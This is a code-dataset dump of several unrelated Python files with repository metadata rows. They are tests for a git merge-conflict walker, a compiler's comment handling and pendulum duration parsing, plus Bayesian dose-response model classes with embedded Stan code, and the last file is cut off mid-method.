| 32.181818 | 93 | 0.587571 | 149 | 1,416 | 5.442953 | 0.315436 | 0.147965 | 0.184957 | 0.21455 | 0.745993 | 0.745993 | 0.70037 | 0.70037 | 0.644883 | 0.644883 | 0 | 0.042914 | 0.292373 | 1,416 | 43 | 94 | 32.930233 | 0.766467 | 0.03178 | 0 | 0.621622 | 1 | 0 | 0.07962 | 0.016801 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.027027 | 0 | 0.108108 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
c1b31d34f6ca08a60d1783237c402e2b4547c651 | 9,908 | py | Python | tests/_amt_utils_test.py | xgouchet/AutoMergeTool | d63c057440a99e868e5eb25720f8d89640112f04 | [
"Apache-2.0"
] | 41 | 2017-04-10T10:12:32.000Z | 2022-02-11T09:34:43.000Z | tests/_amt_utils_test.py | xgouchet/AutoMergeTool | d63c057440a99e868e5eb25720f8d89640112f04 | [
"Apache-2.0"
] | 14 | 2017-02-17T09:58:57.000Z | 2018-02-12T14:38:51.000Z | tests/_amt_utils_test.py | xgouchet/ArachneMergeTool | d63c057440a99e868e5eb25720f8d89640112f04 | [
"Apache-2.0"
] | 5 | 2017-04-11T13:03:20.000Z | 2021-06-23T08:41:10.000Z | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
import filecmp
import unittest
from automergetool.amt_utils import *
CW_PATH = 'tests/data/conflict_walker/{0}.txt'
RESOLUTION = "Nunc quis interdum nunc. Praesent mollis risus enim, at elementum quam finibus ut.\n"
REWRITE = "<<<<<<< LOCAL\n" + "Nam quam nunc, blandit vel, luctus pulvinar, hendrerit id, lorem. Maecenas nec odio et ante tincidunt tempus. Donec vitae sapien ut \n" + "|||||||\n" + "Nam quam nunc, blandit vel, luctus pulvinar, hendrerit id, lorem. Maecenas nec odio et ante tincidunt tempus. Donec vitae sapien ut \n" + "=======\n" + ">>>>>>> REMOTE\n" + "libero venenatis faucibus. Nullam quis ante. Etiam sit amet orci eget eros faucibus tincidunt. Duis leo. Sed fringilla mauris sit amet \n" + "<<<<<<< LOCAL\n" + "|||||||\n" + "nibh. Donec sodales sagittis magna. Sed consequat, leo eget bibendum sodales, augue velit cursus nunc,\n" + "=======\n" + "nibh. Donec sodales sagittis magna. Sed consequat, leo eget bibendum sodales, augue velit cursus nunc,\n" + ">>>>>>> REMOTE\n" + "Nunc quis interdum nunc. Praesent mollis risus enim, at elementum quam finibus ut.\n"
class ConflictTest(unittest.TestCase):
def test_no_conflicts(self):
"""Tests a walker against a file without conflicts"""
# Given a file to merge
file = CW_PATH.format('no_conflicts')
walker = ConflictsWalker(file, 'test', REPORT_NONE, False)
# When walking the conflicts
self.assertFalse(walker.has_more_conflicts())
walker.end(False)
# Then check the output
self.assertTrue(filecmp.cmp(walker.merged, file))
self.assertEqual(walker.get_merge_status(), SUCCESS)
os.remove(walker.merged)
def test_single_conflict_unsolved(self):
"""Tests a walker against a file with a single conflict, without solving it"""
# Given a file to merge
file = CW_PATH.format('single_conflict')
walker = ConflictsWalker(file, 'test', REPORT_NONE, False)
# When walking the conflicts
self.assertTrue(walker.has_more_conflicts())
self.assertFalse(walker.has_more_conflicts())
walker.end(False)
# Then check the output
self.assertTrue(filecmp.cmp(walker.merged, file))
self.assertEqual(walker.get_merge_status(), ERROR_CONFLICTS)
os.remove(walker.merged)
def test_single_conflict_rewritten(self):
"""Tests a walker against a file with a single conflict, without solving it"""
# Given a file to merge
file = CW_PATH.format('single_conflict')
walker = ConflictsWalker(file, 'test', REPORT_NONE, False)
# When walking the conflicts
self.assertTrue(walker.has_more_conflicts())
conflict = walker.next_conflict()
conflict.rewrite(RESOLUTION)
self.assertFalse(walker.has_more_conflicts())
walker.end(False)
# Then check the output
self.assertTrue(filecmp.cmp(walker.merged, CW_PATH.format('single_conflict_resolved')))
self.assertEqual(walker.get_merge_status(), ERROR_CONFLICTS)
os.remove(walker.merged)
def test_single_conflict_solved(self):
"""Tests a walker against a file with a single conflict, and solving it"""
# Given a file to merge
file = CW_PATH.format('single_conflict')
walker = ConflictsWalker(file, 'test', REPORT_NONE, False)
# When walking the conflicts
self.assertTrue(walker.has_more_conflicts())
conflict = walker.next_conflict()
conflict.resolve(RESOLUTION)
self.assertFalse(walker.has_more_conflicts())
walker.end(False)
# Then check the output
self.assertTrue(filecmp.cmp(walker.merged, CW_PATH.format('single_conflict_resolved')))
self.assertEqual(walker.get_merge_status(), SUCCESS)
os.remove(walker.merged)
def test_three_conflicts_half_solved_with_full_report(self):
"""Tests a walker against a file with three conflicts, and solving one of them"""
# Given a file to merge
file = CW_PATH.format('three_conflicts')
walker = ConflictsWalker(file, 'test', REPORT_FULL, False)
# When walking the conflicts
self.assertTrue(walker.has_more_conflicts())
conflict = walker.next_conflict()
conflict.resolve(RESOLUTION)
self.assertTrue(walker.has_more_conflicts())
conflict = walker.next_conflict() # not solved
self.assertTrue(walker.has_more_conflicts())
conflict = walker.next_conflict()
conflict.rewrite(REWRITE)
self.assertFalse(walker.has_more_conflicts())
walker.end(False)
# Then check the output
self.assertTrue(filecmp.cmp(walker.merged, CW_PATH.format('three_conflicts_half_solved')))
self.assertTrue(
filecmp.cmp(file + '.test-report',
CW_PATH.format('three_conflicts_half_solved') + '.test-full-report'))
self.assertEqual(walker.get_merge_status(), ERROR_CONFLICTS)
os.remove(walker.merged)
def test_three_conflicts_half_solved_with_solved_report(self):
"""Tests a walker against a file with three conflicts, and solving one of them"""
# Given a file to merge
file = CW_PATH.format('three_conflicts')
walker = ConflictsWalker(file, 'test', REPORT_SOLVED, False)
# When walking the conflicts
self.assertTrue(walker.has_more_conflicts())
conflict = walker.next_conflict()
conflict.resolve(RESOLUTION)
self.assertTrue(walker.has_more_conflicts())
conflict = walker.next_conflict() # not solved
self.assertTrue(walker.has_more_conflicts())
conflict = walker.next_conflict()
conflict.rewrite(REWRITE)
self.assertFalse(walker.has_more_conflicts())
walker.end(False)
# Then check the output
self.assertTrue(filecmp.cmp(walker.merged, CW_PATH.format('three_conflicts_half_solved')))
self.assertTrue(
filecmp.cmp(file + '.test-report',
CW_PATH.format('three_conflicts_half_solved') + '.test-solved-report'))
self.assertEqual(walker.get_merge_status(), ERROR_CONFLICTS)
os.remove(walker.merged)
def test_three_conflicts_half_solved_with_unsolved_report(self):
"""Tests a walker against a file with three conflicts, and solving one of them"""
# Given a file to merge
file = CW_PATH.format('three_conflicts')
walker = ConflictsWalker(file, 'test', REPORT_UNSOLVED, False)
# When walking the conflicts
self.assertTrue(walker.has_more_conflicts())
conflict = walker.next_conflict()
conflict.resolve(RESOLUTION)
self.assertTrue(walker.has_more_conflicts())
conflict = walker.next_conflict() # not solved
self.assertTrue(walker.has_more_conflicts())
conflict = walker.next_conflict()
conflict.rewrite(REWRITE)
self.assertFalse(walker.has_more_conflicts())
walker.end(False)
# Then check the output
self.assertTrue(filecmp.cmp(walker.merged, CW_PATH.format('three_conflicts_half_solved')))
self.assertTrue(
filecmp.cmp(file + '.test-report',
CW_PATH.format('three_conflicts_half_solved') + '.test-unsolved-report'))
self.assertEqual(walker.get_merge_status(), ERROR_CONFLICTS)
os.remove(walker.merged)
def test_missing_base_side(self):
"""Tests a walker against a file with conflicts without the `diff3` conflict style"""
# Given a file to merge
file = CW_PATH.format('missing_base')
walker = ConflictsWalker(file, '', REPORT_NONE)
# When walking the conflicts
with self.assertRaises(RuntimeError):
walker.has_more_conflicts()
walker.end(False)
os.remove(walker.merged)
def test_invalid_conflict_section_1(self):
"""Tests a walker against a file with invalid conflict section"""
# Given a file to merge
file = CW_PATH.format('invalid_conflict_1')
walker = ConflictsWalker(file, '', REPORT_NONE)
# When walking the conflicts
with self.assertRaises(RuntimeError):
walker.has_more_conflicts()
walker.end(False)
os.remove(walker.merged)
def test_invalid_conflict_section_2(self):
"""Tests a walker against a file with invalid conflict section"""
# Given a file to merge
file = CW_PATH.format('invalid_conflict_2')
walker = ConflictsWalker(file, 'test', REPORT_NONE, False)
# When walking the conflicts
with self.assertRaises(RuntimeError):
walker.has_more_conflicts()
walker.end(False)
os.remove(walker.merged)
def test_invalid_conflict_section_3(self):
"""Tests a walker against a file with invalid conflict section"""
# Given a file to merge
file = CW_PATH.format('invalid_conflict_3')
walker = ConflictsWalker(file, 'test', REPORT_NONE, False)
# When walking the conflicts
with self.assertRaises(RuntimeError):
walker.has_more_conflicts()
walker.end(False)
os.remove(walker.merged)
def test_extract_lines(self):
"""Tests how a conflict extracts lines from blocks"""
# Given a file to merge
local = "\n" # empty
base = "foo\nbar\nbaz\neggs\nbacon\n"
remote = "hello world\n"
conflict = Conflict(local, base, remote, "<<<<<<<\n", ">>>>>>>\n")
# extracting lines
self.assertEqual(conflict.local_lines(), [])
self.assertEqual(conflict.base_lines(), ["foo\n", "bar\n", "baz\n", "eggs\n", "bacon\n"])
self.assertEqual(conflict.remote_lines(), ["hello world\n"])
if __name__ == '__main__':
unittest.main()
| 40.942149 | 872 | 0.662798 | 1,202 | 9,908 | 5.292845 | 0.143095 | 0.018076 | 0.046998 | 0.079535 | 0.874096 | 0.871424 | 0.870009 | 0.865608 | 0.858378 | 0.848004 | 0 | 0.00131 | 0.229612 | 9,908 | 241 | 873 | 41.112033 | 0.832176 | 0.162798 | 0 | 0.716312 | 0 | 0.035461 | 0.186631 | 0.03574 | 0.007092 | 0 | 0 | 0 | 0.304965 | 1 | 0.085106 | false | 0 | 0.021277 | 0 | 0.113475 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
c1db49643573088e944ab3e9708c5f78ae7f1898 | 1,265 | py | Python | test/test_comments.py | ajstrand/rbc | 21b92f2e66c6e00f6b71373b5b3996612c797527 | [
"MIT"
] | 12 | 2016-02-04T12:27:04.000Z | 2021-05-07T01:51:55.000Z | test/test_comments.py | ajstrand/rbc | 21b92f2e66c6e00f6b71373b5b3996612c797527 | [
"MIT"
] | null | null | null | test/test_comments.py | ajstrand/rbc | 21b92f2e66c6e00f6b71373b5b3996612c797527 | [
"MIT"
] | 3 | 2017-11-02T17:13:03.000Z | 2021-12-24T07:22:47.000Z | def test_simple_comment(check_output):
check_output('''
main() {
extrn putchar;
/* a comment */
putchar('a');
}
''', 'a')
def test_comment_stops_at_first_terminator(check_output):
check_output('''
main() {
extrn putchar;
/* a comment */
putchar('a');
/* another comment */
}
''', 'a')
def test_comment_accepts_initial_asterisk(check_output):
check_output('''
main() {
extrn putchar;
/** a comment */
putchar('a');
}
''', 'a')
def test_comment_accepts_final_asterisk(check_output):
check_output('''
main() {
extrn putchar;
/* a comment **/
putchar('a');
}
''', 'a')
def test_comment_accepts_medial_asterisk(check_output):
check_output('''
main() {
extrn putchar;
/* a * comment */
putchar('a');
}
''', 'a')
def test_comment_accepts_newline(check_output):
check_output('''
main() {
extrn putchar;
/* a
multi
line
comment */
putchar('a');
}
''', 'a')
| 20.403226 | 57 | 0.455336 | 110 | 1,265 | 4.927273 | 0.209091 | 0.243542 | 0.177122 | 0.243542 | 0.804428 | 0.763838 | 0.763838 | 0.763838 | 0.691882 | 0.691882 | 0 | 0 | 0.406324 | 1,265 | 61 | 58 | 20.737705 | 0.721704 | 0 | 0 | 0.615385 | 0 | 0 | 0.608386 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.115385 | false | 0 | 0 | 0 | 0.115385 | 0 | 0 | 0 | 0 | null | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
a9e80877a23364e28bb2226afe89aba355ededca | 7,361 | py | Python | tests/parsing/test_parsing_duration.py | shammellee/pendulum | bb179c8fb6ef92b7bfc471a46338abbfac9fafca | [
"MIT"
] | 1 | 2018-11-25T03:10:22.000Z | 2018-11-25T03:10:22.000Z | tests/parsing/test_parsing_duration.py | shammellee/pendulum | bb179c8fb6ef92b7bfc471a46338abbfac9fafca | [
"MIT"
] | null | null | null | tests/parsing/test_parsing_duration.py | shammellee/pendulum | bb179c8fb6ef92b7bfc471a46338abbfac9fafca | [
"MIT"
] | 1 | 2020-07-24T17:37:18.000Z | 2020-07-24T17:37:18.000Z | import pytest
from pendulum.parsing import parse, ParserError
def test_parse_duration():
text = "P2Y3M4DT5H6M7S"
parsed = parse(text)
assert parsed.years == 2
assert parsed.months == 3
assert parsed.weeks == 0
assert parsed.remaining_days == 4
assert parsed.hours == 5
assert parsed.minutes == 6
assert parsed.remaining_seconds == 7
assert parsed.microseconds == 0
text = "P1Y2M3DT4H5M6.5S"
parsed = parse(text)
assert parsed.years == 1
assert parsed.months == 2
assert parsed.weeks == 0
assert parsed.remaining_days == 3
assert parsed.hours == 4
assert parsed.minutes == 5
assert parsed.remaining_seconds == 6
assert parsed.microseconds == 500000
text = "P1Y2M3DT4H5M6,5S"
parsed = parse(text)
assert parsed.years == 1
assert parsed.months == 2
assert parsed.weeks == 0
assert parsed.remaining_days == 3
assert parsed.hours == 4
assert parsed.minutes == 5
assert parsed.remaining_seconds == 6
assert parsed.microseconds == 500000
text = "P1Y2M3D"
parsed = parse(text)
assert parsed.years == 1
assert parsed.months == 2
assert parsed.weeks == 0
assert parsed.remaining_days == 3
assert parsed.hours == 0
assert parsed.minutes == 0
assert parsed.remaining_seconds == 0
assert parsed.microseconds == 0
text = "P1Y2M3.5D"
parsed = parse(text)
assert parsed.years == 1
assert parsed.months == 2
assert parsed.weeks == 0
assert parsed.remaining_days == 3
assert parsed.hours == 12
assert parsed.minutes == 0
assert parsed.remaining_seconds == 0
assert parsed.microseconds == 0
text = "P1Y2M3,5D"
parsed = parse(text)
assert parsed.years == 1
assert parsed.months == 2
assert parsed.weeks == 0
assert parsed.remaining_days == 3
assert parsed.hours == 12
assert parsed.minutes == 0
assert parsed.remaining_seconds == 0
assert parsed.microseconds == 0
text = "PT4H54M6.5S"
parsed = parse(text)
assert parsed.years == 0
assert parsed.months == 0
assert parsed.weeks == 0
assert parsed.remaining_days == 0
assert parsed.hours == 4
assert parsed.minutes == 54
assert parsed.remaining_seconds == 6
assert parsed.microseconds == 500000
text = "PT4H54M6,5S"
parsed = parse(text)
assert parsed.years == 0
assert parsed.months == 0
assert parsed.weeks == 0
assert parsed.remaining_days == 0
assert parsed.hours == 4
assert parsed.minutes == 54
assert parsed.remaining_seconds == 6
assert parsed.microseconds == 500000
text = "P1Y"
parsed = parse(text)
assert parsed.years == 1
assert parsed.months == 0
assert parsed.weeks == 0
assert parsed.remaining_days == 0
assert parsed.hours == 0
assert parsed.minutes == 0
assert parsed.remaining_seconds == 0
assert parsed.microseconds == 0
text = "P1.5Y"
with pytest.raises(ParserError):
parse(text)
text = "P1,5Y"
with pytest.raises(ParserError):
parse(text)
text = "P1M"
parsed = parse(text)
assert parsed.years == 0
assert parsed.months == 1
assert parsed.weeks == 0
assert parsed.remaining_days == 0
assert parsed.hours == 0
assert parsed.minutes == 0
assert parsed.remaining_seconds == 0
assert parsed.microseconds == 0
text = "P1.5M"
with pytest.raises(ParserError):
parse(text)
text = "P1,5M"
with pytest.raises(ParserError):
parse(text)
text = "P1W"
parsed = parse(text)
assert parsed.years == 0
assert parsed.months == 0
assert parsed.weeks == 1
assert parsed.remaining_days == 0
assert parsed.hours == 0
assert parsed.minutes == 0
assert parsed.remaining_seconds == 0
assert parsed.microseconds == 0
text = "P1.5W"
parsed = parse(text)
assert parsed.years == 0
assert parsed.months == 0
assert parsed.weeks == 1
assert parsed.remaining_days == 3
assert parsed.hours == 12
assert parsed.minutes == 0
assert parsed.remaining_seconds == 0
assert parsed.microseconds == 0
text = "P1,5W"
parsed = parse(text)
assert parsed.years == 0
assert parsed.months == 0
assert parsed.weeks == 1
assert parsed.remaining_days == 3
assert parsed.hours == 12
assert parsed.minutes == 0
assert parsed.remaining_seconds == 0
assert parsed.microseconds == 0
text = "P1D"
parsed = parse(text)
assert parsed.years == 0
assert parsed.months == 0
assert parsed.weeks == 0
assert parsed.remaining_days == 1
assert parsed.hours == 0
assert parsed.minutes == 0
assert parsed.remaining_seconds == 0
assert parsed.microseconds == 0
text = "P1.5D"
parsed = parse(text)
assert parsed.years == 0
assert parsed.months == 0
assert parsed.weeks == 0
assert parsed.remaining_days == 1
assert parsed.hours == 12
assert parsed.minutes == 0
assert parsed.remaining_seconds == 0
assert parsed.microseconds == 0
text = "P1,5D"
parsed = parse(text)
assert parsed.years == 0
assert parsed.months == 0
assert parsed.weeks == 0
assert parsed.remaining_days == 1
assert parsed.hours == 12
assert parsed.minutes == 0
assert parsed.remaining_seconds == 0
assert parsed.microseconds == 0
text = "PT1H"
parsed = parse(text)
assert parsed.years == 0
assert parsed.months == 0
assert parsed.weeks == 0
assert parsed.remaining_days == 0
assert parsed.hours == 1
assert parsed.minutes == 0
assert parsed.remaining_seconds == 0
assert parsed.microseconds == 0
text = "PT1.5H"
parsed = parse(text)
assert parsed.years == 0
assert parsed.months == 0
assert parsed.weeks == 0
assert parsed.remaining_days == 0
assert parsed.hours == 1
assert parsed.minutes == 30
assert parsed.remaining_seconds == 0
assert parsed.microseconds == 0
text = "PT1,5H"
parsed = parse(text)
assert parsed.years == 0
assert parsed.months == 0
assert parsed.weeks == 0
assert parsed.remaining_days == 0
assert parsed.hours == 1
assert parsed.minutes == 30
assert parsed.remaining_seconds == 0
assert parsed.microseconds == 0
def test_parse_duration_no_operator():
with pytest.raises(ParserError):
parse("2Y3M4DT5H6M7S")
def test_parse_duration_weeks_combined():
with pytest.raises(ParserError):
parse("P1Y2W")
def test_parse_duration_invalid_order():
with pytest.raises(ParserError):
parse("P1S")
with pytest.raises(ParserError):
parse("P1D1S")
with pytest.raises(ParserError):
parse("1Y2M3D1SPT1M")
with pytest.raises(ParserError):
parse("P1Y2M3D2MT1S")
with pytest.raises(ParserError):
parse("P2M3D1ST1Y1M")
with pytest.raises(ParserError):
parse("P1Y2M2MT3D1S")
with pytest.raises(ParserError):
parse("P1D1Y1M")
with pytest.raises(ParserError):
parse("PT1S1H")
def test_parse_duration_invalid():
with pytest.raises(ParserError):
parse("P1Dasdfasdf")
def test_parse_duration_fraction_only_allowed_on_last_component():
with pytest.raises(ParserError):
parse("P2Y3M4DT5.5H6M7S")
| 24.868243 | 66 | 0.650999 | 907 | 7,361 | 5.213892 | 0.085998 | 0.385705 | 0.217171 | 0.13026 | 0.90738 | 0.809473 | 0.802707 | 0.802707 | 0.793614 | 0.793614 | 0 | 0.052793 | 0.248608 | 7,361 | 295 | 67 | 24.952542 | 0.802206 | 0 | 0 | 0.786325 | 0 | 0 | 0.037359 | 0 | 0 | 0 | 0 | 0 | 0.649573 | 1 | 0.025641 | false | 0 | 0.008547 | 0 | 0.034188 | 0 | 0 | 0 | 0 | null | 1 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 10 |
e71c2e597e3fa2fbf3b733b90b280e2d9d4b2267 | 31,331 | py | Python | bbmd/models/dichotomous.py | uashogeschoolutrecht/bbmd | 40a5beb0554df00b512e672bf5be8297d0523b9b | [
"Apache-2.0"
] | null | null | null | bbmd/models/dichotomous.py | uashogeschoolutrecht/bbmd | 40a5beb0554df00b512e672bf5be8297d0523b9b | [
"Apache-2.0"
] | null | null | null | bbmd/models/dichotomous.py | uashogeschoolutrecht/bbmd | 40a5beb0554df00b512e672bf5be8297d0523b9b | [
"Apache-2.0"
] | null | null | null | import numpy as np
import logging
from scipy import stats
from . import base
class Dichotomous(base.DoseResponseModel):
def extra_risk(self, bmr):
raise NotImplementedError('Abstract method')
def added_risk(self, bmr):
raise NotImplementedError('Abstract method')
def get_input_count(self):
return self.data['len']
def likelihood(self, ps, ys, ns):
ys2 = ys.copy()
ys2[ys2 == 0] = self.ZEROISH
ys2[ys2 == 1] = 1. - self.ZEROISH
return np.sum(ys2 * np.log(ps) + (ns - ys2) * np.log(1. - ps))
def get_plot_bounds(self, xs, vectors):
for i in xrange(xs.size):
resps = self.get_response_values(xs[i], **self.parameters)
vectors[i, :] = (
xs[i],
np.percentile(resps, 5.),
np.percentile(resps, 50.),
np.percentile(resps, 95.),
)
return vectors
def get_predicted_response_vector(self):
raise NotImplementedError('Abstract method')
def get_trend_test(self):
if not hasattr(self, '_trend_z'):
ns = self.data['n']
cases = self.data['y']
doses = self.data['dnorm']
ns_sum = ns.sum()
cases_sum = cases.sum()
expect_case = ns * cases_sum / ns_sum
prod_nd = doses * ns
prod_nd2 = (doses ** 2) * ns
test_v = (ns_sum-cases_sum) * cases_sum * \
(ns_sum * prod_nd2.sum() - prod_nd.sum() ** 2) / \
(ns_sum ** 3)
prod_d_diffoe = (cases - expect_case) * doses
test_z = prod_d_diffoe.sum() / test_v ** 0.5
self._trend_z = test_z
self._trend_p_value = 1 - stats.norm.cdf(test_z)
return [self._trend_z, self._trend_p_value]
def get_stan_model(self):
return self.STAN_MODEL
class Logistic(Dichotomous):
PARAMETERS = ('a', 'b')
STAN_MODEL = """
data {
int<lower=0> len; // number of dose groups
int<lower=0> y[len]; // observed number of cases
int<lower=0> n[len]; // number of subjects
real<lower=0> dnorm[len]; // dose levels
real p_a[2]; // prior for a
real p_b[2]; // prior for b
}
parameters {
real a;
real<lower=0> b;
}
model {
a ~ uniform (p_a[1], p_a[2]);
b ~ uniform (p_b[1], p_b[2]);
for (i in 1:len)
y[i] ~ binomial(n[i],1/(1+exp(-a-b*dnorm[i])));
}
"""
LATEX_EQUATION = r'$f(dose) = \frac{1}{1+e^{-a-b \times dose}}$' # noqa
def get_priors(self):
return {
'p_a': [-50, 50],
'p_b': [0, 100],
}
def get_predicted_response_vector(self):
a = self.parameters['a']
b = self.parameters['b']
doses = self.data['dnorm']
ys = self.data['y']
ns = self.data['n']
predicted = np.zeros(a.size, dtype=np.float64)
observed = np.zeros(a.size, dtype=np.float64)
for i in xrange(a.size):
resp = (1. / (1. + np.exp(-a[i] - b[i] * doses)))
resp[resp == 0] = self.ZEROISH
resp[resp == 1] = 1. - self.ZEROISH
y_post_pred = np.random.binomial(ns, resp)
predicted[i] = -2. * self.likelihood(resp, y_post_pred, ns)
observed[i] = -2. * self.likelihood(resp, ys, ns)
return predicted, observed
def get_loglikelihood(self, samples):
a = samples[0, :]
b = samples[1, :]
doses = self.data['dnorm']
ns = self.data['n']
ys = self.data['y']
predicted = np.zeros(a.size, dtype=np.float64)
for i in xrange(a.size):
resp = (1. / (1. + np.exp(-a[i] - b[i] * doses)))
resp[resp == 0] = self.ZEROISH
resp[resp == 1] = 1. - self.ZEROISH
predicted[i] = self.likelihood(resp, ys, ns)
return predicted
def get_response_values(self, x, **kw):
return 1. / (1. + np.exp(-kw['a'] - kw['b'] * x))
def extra_risk(self, bmr):
a = self.parameters['a']
b = self.parameters['b']
return np.log((1-bmr)/(1+bmr*np.exp(-a)))/(-b)
def added_risk(self, bmr):
a = self.parameters['a']
b = self.parameters['b']
return np.log((1-bmr-bmr/np.exp(-a))/(1+bmr+bmr*np.exp(-a)))/(-b)
def risk_at_dose(self, dose):
a = self.parameters['a']
b = self.parameters['b']
return (1. / (1. + np.exp(-a - b * dose)))
class LogLogistic(Dichotomous):
PARAMETERS = ('a', 'b', 'c')
STAN_MODEL = """
data {
int<lower=0> len; // number of dose groups
int<lower=0> y[len]; // observed number of cases
int<lower=0> n[len]; // number of subjects
real<lower=0> dno0norm[len]; // dose levels
real pwr_lbound; // restraint value
real p_a[2]; // prior for a
real p_b[2]; // prior for b
real p_c[2]; // prior for c
}
parameters {
real <lower=0, upper=1> a;
real <lower=pwr_lbound> b;
real c;
}
model {
a ~ uniform (p_a[1], p_a[2]);
b ~ uniform (p_b[1], p_b[2]);
c ~ uniform (p_c[1], p_c[2]);
for (i in 1:len)
y[i] ~ binomial(n[i],a+(1-a)/(1+exp(-c-b*log(dno0norm[i]))));
}
"""
LATEX_EQUATION = r'$f(dose) = a+\frac{(1-a)}{1+e^{-c-b \times \log(dose)}}$' # noqa
def get_priors(self):
return {
'p_a': [0, 1],
'p_b': [0, 15],
'p_c': [-5, 15],
}
def get_settings(self):
pwr_lbound = self.kwargs.get('pwr_lbound', 1.)
if pwr_lbound < 0. or pwr_lbound > 1.:
raise ValueError('Invalid pwr_lbound: {}'.format(pwr_lbound))
return {
'pwr_lbound': pwr_lbound,
}
def get_predicted_response_vector(self):
a = self.parameters['a']
b = self.parameters['b']
c = self.parameters['c']
doses = self.data['dno0norm']
ys = self.data['y']
ns = self.data['n']
predicted = np.zeros(a.size, dtype=np.float64)
observed = np.zeros(a.size, dtype=np.float64)
for i in xrange(a.size):
resp = np.array(a[i]+(1-a[i])/(1+np.exp(-c[i]-b[i]*np.log(doses))))
resp[resp == 0] = self.ZEROISH
resp[resp == 1] = 1. - self.ZEROISH
y_post_pred = np.random.binomial(ns, resp)
predicted[i] = -2. * self.likelihood(resp, y_post_pred, ns)
observed[i] = -2. * self.likelihood(resp, ys, ns)
return predicted, observed
def get_loglikelihood(self, samples):
# TODO; refactor to not duplicate get_predicted_response_vector
a = samples[0, :]
b = samples[1, :]
c = samples[2, :]
doses = self.data['dno0norm']
ns = self.data['n']
ys = self.data['y']
predicted = np.zeros(a.size, dtype=np.float64)
for i in xrange(a.size):
resp = np.array(a[i]+(1-a[i])/(1+np.exp(-c[i]-b[i]*np.log(doses))))
resp[resp == 0] = self.ZEROISH
resp[resp == 1] = 1. - self.ZEROISH
predicted[i] = self.likelihood(resp, ys, ns)
return predicted
def get_response_values(self, x, **kw):
if x == 0:
x = self.ZEROISH
return kw['a'] + (1 - kw['a']) / (1 + np.exp(-kw['c'] - kw['b'] * np.log(x)))
def extra_risk(self, bmr):
b = self.parameters['b']
c = self.parameters['c']
return np.exp((np.log(bmr / (1. - bmr)) - c) / b)
def added_risk(self, bmr):
a = self.parameters['a']
b = self.parameters['b']
c = self.parameters['c']
return np.exp((np.log(bmr / (1. - a - bmr)) - c) / b)
def risk_at_dose(self, dose):
a = self.parameters['a']
b = self.parameters['b']
c = self.parameters['c']
return (a + (1 - a) / (1 + np.exp(-c - b * np.log(dose))))
class LogProbit(Dichotomous):
PARAMETERS = ('a', 'b', 'c')
STAN_MODEL = """
data {
int<lower=0> len; // number of dose groups
int<lower=0> y[len]; // observed number of cases
int<lower=0> n[len]; // number of subjects
real<lower=0> dno0norm[len]; // dose levels
real pwr_lbound; // restraint value
real p_a[2]; // prior for a
real p_b[2]; // prior for b
real p_c[2]; // prior for c
}
parameters {
real <lower=0, upper=1> a;
real <lower=pwr_lbound> b;
real c;
}
model {
a ~ uniform (p_a[1], p_a[2]);
b ~ uniform (p_b[1], p_b[2]);
c ~ uniform (p_c[1], p_c[2]);
for (i in 1:len)
y[i] ~ binomial(n[i], a + (1-a) * normal_cdf(c + b * log(dno0norm[i]), 0, 1));
}
"""
LATEX_EQUATION = r'$f(dose) = a + (1 - a) \times \Phi(c+b \times \log(dose))$' # noqa
def get_priors(self):
return {
'p_a': [0, 1],
'p_b': [0, 15],
'p_c': [-5, 15],
}
def get_settings(self):
pwr_lbound = self.kwargs.get('pwr_lbound', 1.)
if pwr_lbound < 0. or pwr_lbound > 1.:
raise ValueError('Invalid pwr_lbound: {}'.format(pwr_lbound))
return {
'pwr_lbound': pwr_lbound,
}
def get_predicted_response_vector(self):
a = self.parameters['a']
b = self.parameters['b']
c = self.parameters['c']
doses = self.data['dno0norm']
ys = self.data['y']
ns = self.data['n']
predicted = np.zeros(a.size, dtype=np.float64)
observed = np.zeros(a.size, dtype=np.float64)
for i in xrange(a.size):
resp = np.array(a[i]+(1.-a[i])*stats.norm.cdf(c[i]+b[i]*np.log(doses)))
resp[resp == 0] = self.ZEROISH
resp[resp == 1] = 1. - self.ZEROISH
y_post_pred = np.random.binomial(ns, resp)
predicted[i] = -2. * self.likelihood(resp, y_post_pred, ns)
observed[i] = -2. * self.likelihood(resp, ys, ns)
return predicted, observed
def get_loglikelihood(self, samples):
# TODO; refactor to not duplicate get_predicted_response_vector
a = samples[0, :]
b = samples[1, :]
c = samples[2, :]
doses = self.data['dno0norm']
ns = self.data['n']
ys = self.data['y']
predicted = np.zeros(a.size, dtype=np.float64)
for i in xrange(a.size):
resp = np.array(a[i]+(1.-a[i])*stats.norm.cdf(c[i]+b[i]*np.log(doses)))
resp[resp == 0] = self.ZEROISH
resp[resp == 1] = 1. - self.ZEROISH
predicted[i] = self.likelihood(resp, ys, ns)
return predicted
def get_response_values(self, x, **kw):
if x == 0:
x = self.ZEROISH
return kw['a'] + (1 - kw['a']) * stats.norm.cdf(kw['c'] + kw['b'] * np.log(x))
def extra_risk(self, bmr):
b = self.parameters['b']
c = self.parameters['c']
return np.exp((stats.norm.ppf(bmr) - c) / b)
def added_risk(self, bmr):
a = self.parameters['a']
b = self.parameters['b']
c = self.parameters['c']
return np.exp((stats.norm.ppf(bmr / (1. - a)) - c) / b)
def risk_at_dose(self, dose):
